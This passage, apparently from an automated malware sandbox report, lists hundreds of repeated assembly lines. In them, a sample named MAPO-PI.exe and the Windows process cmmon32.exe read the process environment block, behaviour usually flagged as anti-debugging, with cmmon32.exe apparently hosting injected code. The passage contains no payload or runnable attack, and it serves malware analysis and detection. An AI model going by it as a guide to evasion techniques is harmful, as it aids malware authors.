Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h] 3_2_01916CF0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019514FB mov eax, dword ptr fs:[00000030h] 3_2_019514FB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h] 3_2_0196740D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h] 3_2_0196740D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h] 3_2_0196740D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h] 3_2_018CBC2C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h] 3_2_0192C450
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h] 3_2_0192C450
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h] 3_2_018CA44B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B746D mov eax, dword ptr fs:[00000030h] 3_2_018B746D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h] 3_2_01917794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h] 3_2_01917794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h] 3_2_01917794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h] 3_2_018A8794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h] 3_2_018D37F5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h] 3_2_0192FF10
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h] 3_2_0192FF10
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h] 3_2_018CA70E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h] 3_2_018CA70E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196070D mov eax, dword ptr fs:[00000030h] 3_2_0196070D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196070D mov eax, dword ptr fs:[00000030h] 3_2_0196070D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h] 3_2_018BF716
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h] 3_2_01894F2E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h] 3_2_01894F2E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h] 3_2_018BB73D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h] 3_2_018BB73D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h] 3_2_018CE730
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h] 3_2_018AEF40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h] 3_2_018AFF60
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h] 3_2_01968F6A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h] 3_2_0192FE87
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h] 3_2_01960EA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h] 3_2_01960EA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h] 3_2_01960EA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h] 3_2_019146A7
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h] 3_2_01968ED6
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h] 3_2_018C36CC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h] 3_2_018D8EC7
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h] 3_2_0194FEC0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h] 3_2_018A76E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h] 3_2_018C16E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h] 3_2_0189C600
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h] 3_2_0189C600
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h] 3_2_0189C600
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h] 3_2_018C8E00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h] 3_2_018CA61C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h] 3_2_018CA61C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951608 mov eax, dword ptr fs:[00000030h] 3_2_01951608
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h] 3_2_0189E620
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h] 3_2_0194FE3F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h] 3_2_0195AE44
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h] 3_2_0195AE44
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A766D mov eax, dword ptr fs:[00000030h] 3_2_018A766D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38CD6 mov eax, dword ptr fs:[00000030h] 16_2_04D38CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D214FB mov eax, dword ptr fs:[00000030h] 16_2_04D214FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h] 16_2_04CE6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h] 16_2_04CE6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h] 16_2_04CE6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7849B mov eax, dword ptr fs:[00000030h] 16_2_04C7849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A44B mov eax, dword ptr fs:[00000030h] 16_2_04C9A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h] 16_2_04CFC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h] 16_2_04CFC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8746D mov eax, dword ptr fs:[00000030h] 16_2_04C8746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] 16_2_04D3740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] 16_2_04D3740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] 16_2_04D3740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9BC2C mov eax, dword ptr fs:[00000030h] 16_2_04C9BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov ecx, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D18DF1 mov eax, dword ptr fs:[00000030h] 16_2_04D18DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h] 16_2_04C7D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h] 16_2_04C7D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h] 16_2_04C9FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h] 16_2_04C9FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C935A1 mov eax, dword ptr fs:[00000030h] 16_2_04C935A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] 16_2_04C91DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] 16_2_04C91DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] 16_2_04C91DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h] 16_2_04D305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h] 16_2_04D305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA3D43 mov eax, dword ptr fs:[00000030h] 16_2_04CA3D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE3540 mov eax, dword ptr fs:[00000030h] 16_2_04CE3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D13D40 mov eax, dword ptr fs:[00000030h] 16_2_04D13D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C87D50 mov eax, dword ptr fs:[00000030h] 16_2_04C87D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h] 16_2_04C8C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h] 16_2_04C8C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38D34 mov eax, dword ptr fs:[00000030h] 16_2_04D38D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2E539 mov eax, dword ptr fs:[00000030h] 16_2_04D2E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] 16_2_04C94D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] 16_2_04C94D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] 16_2_04C94D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6AD30 mov eax, dword ptr fs:[00000030h] 16_2_04C6AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CEA537 mov eax, dword ptr fs:[00000030h] 16_2_04CEA537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38ED6 mov eax, dword ptr fs:[00000030h] 16_2_04D38ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C936CC mov eax, dword ptr fs:[00000030h] 16_2_04C936CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA8EC7 mov eax, dword ptr fs:[00000030h] 16_2_04CA8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FEC0 mov eax, dword ptr fs:[00000030h] 16_2_04D1FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C776E2 mov eax, dword ptr fs:[00000030h] 16_2_04C776E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C916E0 mov ecx, dword ptr fs:[00000030h] 16_2_04C916E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFFE87 mov eax, dword ptr fs:[00000030h] 16_2_04CFFE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE46A7 mov eax, dword ptr fs:[00000030h] 16_2_04CE46A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] 16_2_04D30EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] 16_2_04D30EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] 16_2_04D30EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h] 16_2_04D2AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h] 16_2_04D2AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7766D mov eax, dword ptr fs:[00000030h] 16_2_04C7766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] 16_2_04C6C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] 16_2_04C6C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] 16_2_04C6C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C98E00 mov eax, dword ptr fs:[00000030h] 16_2_04C98E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h] 16_2_04C9A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h] 16_2_04C9A61C
